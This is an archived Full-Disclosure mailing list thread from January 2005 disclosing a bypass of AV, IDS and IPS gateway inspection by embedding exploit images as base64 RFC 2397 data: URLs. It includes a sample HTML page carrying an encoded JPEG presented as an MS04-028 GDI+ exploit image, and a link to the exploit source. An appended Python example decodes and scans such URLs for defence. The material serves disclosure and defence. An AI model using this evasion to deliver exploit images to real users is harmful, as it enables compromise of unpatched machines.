Full Disclosure mailing list archives
Re: Multi-vendor AV gateway image inspection bypass vulnerability
From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 11 Jan 2005 18:56:00 -0800 (PST)
At this point I have no choice but to agree. So far I've had an opportunity to test this with Check Point Interspect and McAfee IntruShield. Like you said, (in my lab) both detected and blocked the malicious image when it was formatted without RFC 2397, but when base64 encoded they were downloaded and executed their attack. Basically it's looking like no security companies are looking at data formatted in this fashion. I'm not sure, but it seems like you can probably transfer anything you'd like by just changing the content type and your anti-virus, IDS, application firewall or whatever you're using at the network level would be completely oblivious.

On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds <lists () intrusense com> wrote:
Hello Danny,

This vulnerability is only applicable to the HTTP data while in transit. Once received by the client the image will be rendered and subsequently detected by local AV software. At the present time, I'm not aware of any AV, IDS or IPS vendor that will detect malicious images embedded in HTML in this manner.
Thank you,

Darren Bounds
Intrusense, LLC.
--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content. By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme, a remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.
For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee); however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and it is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme, Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.
## BEGIN HTML ##
<html>
<body>
<img src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw/
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
xAAfAAABBQEBAQEBAQAAAAAAAAAA
AQIDBAUGBwgJCgv/
xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/
xAAfAQADAQEBAQEBAQEBAAAAAAAA
AQIDBAUGBwgJCgv/
xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/
APn+iiigD//Z">
</body>
</html>
## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D
_______________________________________________
Full-Disclosure - We believe in it. Charter:
http://lists.netsys.com/full-disclosure-charter.html
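The following is an added example, not code from the advisory or from any vendor named in this thread. It implements the step the advisory reports the tested gateways skipping: find RFC 2397 data: URLs in an HTML body, decode them (base64 or percent-encoded, tolerating the line wrapping the sample HTML carries inside the src attribute, as browsers do), identify the decoded bytes by magic number instead of trusting the declared mediatype, and hand the bytes to the same scanner that would have seen a plain image response. Note that the advisory's own sample declares image/gif while its payload starts with /9j/4AAQSkZJRg, which decodes to a JPEG/JFIF header. The sample HTML, the magic-number table and the placeholder scanner rule below are constructed for this example and stand in for a real engine's signatures.

```python
"""Gateway-side inspection of RFC 2397 data: URLs embedded in HTML.

Added example (not from the advisory or any vendor product). Decodes every
data: URL found in src/href attributes and runs a scanner over the bytes,
reporting declared vs. sniffed type so a policy layer can block on either.
"""
import base64
import re
from urllib.parse import unquote_to_bytes

# Attribute values that carry a data: URL. Only src/href are covered here
# (assumption; a production filter would also walk CSS url() and srcset).
DATA_URL_ATTR = re.compile(
    r"""\b(?:src|href)\s*=\s*["'](data:[^"']*)["']""", re.IGNORECASE | re.DOTALL)

# RFC 2397 grammar: data:[<mediatype>][;base64],<data>
DATA_URL = re.compile(r"^data:(?P<meta>[^,]*),(?P<payload>.*)$", re.DOTALL)

# Magic numbers used to identify content regardless of declared type
# (the table is an assumption of this example, not a vendor list).
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
}


def parse_data_url(url):
    """Return (declared_mediatype, decoded_bytes) for an RFC 2397 URL."""
    m = DATA_URL.match(url.strip())
    if m is None:
        raise ValueError("not an RFC 2397 data URL")
    params = [p.strip() for p in m.group("meta").split(";")]
    is_base64 = bool(params) and params[-1].lower() == "base64"
    if is_base64:
        params.pop()
    # RFC 2397: an omitted mediatype defaults to text/plain.
    mediatype = (params[0] if params and params[0] else "text/plain").lower()
    payload = m.group("payload")
    if is_base64:
        # Browsers tolerate whitespace (the advisory's sample is line-wrapped
        # inside the attribute) and missing padding; decode the way they do,
        # otherwise the scanner fails on exactly the input the client renders.
        compact = re.sub(r"\s+", "", payload)
        compact += "=" * (-len(compact) % 4)
        data = base64.b64decode(compact)
    else:
        data = unquote_to_bytes(payload)
    return mediatype, data


def sniff(data):
    """Identify content by magic bytes; None if no known signature."""
    for magic, mediatype in MAGIC.items():
        if data.startswith(magic):
            return mediatype
    return None


def inspect_html(html, scanner):
    """Decode every data: URL in `html` and run `scanner(bytes) -> bool` on it.

    Returns one finding per data URL: declared type, sniffed type, size,
    whether the two disagree, and the scanner verdict.
    """
    findings = []
    for url in DATA_URL_ATTR.findall(html):
        declared, data = parse_data_url(url)
        actual = sniff(data)
        findings.append({
            "declared": declared,
            "actual": actual,
            "size": len(data),
            "type_mismatch": actual is not None and actual != declared,
            "malicious": bool(scanner(data)),
        })
    return findings


# --- Constructed sample input (not the advisory's payload) -------------------
# A minimal JPEG header followed by a long filler run, wrapped across lines
# inside the attribute the way the advisory's HTML is, and declared as
# image/gif even though the bytes are JPEG.
_SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"A" * 120 + b"\xff\xd9"
_WRAPPED_B64 = "\n".join(re.findall(".{1,72}", base64.b64encode(_SAMPLE_JPEG).decode()))
SAMPLE_HTML = f"""<html><body>
<img src="http://www.example.com/logo.gif">
<img src="data:image/gif;base64,{_WRAPPED_B64}">
<a href="data:text/plain,hello%20world">note</a>
</body></html>"""


def placeholder_scanner(data):
    """Stand-in for a real AV engine: a hypothetical rule flagging the filler run."""
    return b"A" * 64 in data


def demo():
    """Run the inspection over the constructed sample page."""
    return inspect_html(SAMPLE_HTML, placeholder_scanner)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The point of the decoded-bytes path is that the engine which already caught the un-encoded JPEG sees the same bytes again; the declared/actual mismatch is a separate signal worth logging or blocking on, since it is exactly the "just changing the content type" case raised in the reply above.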
Current thread:
- Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)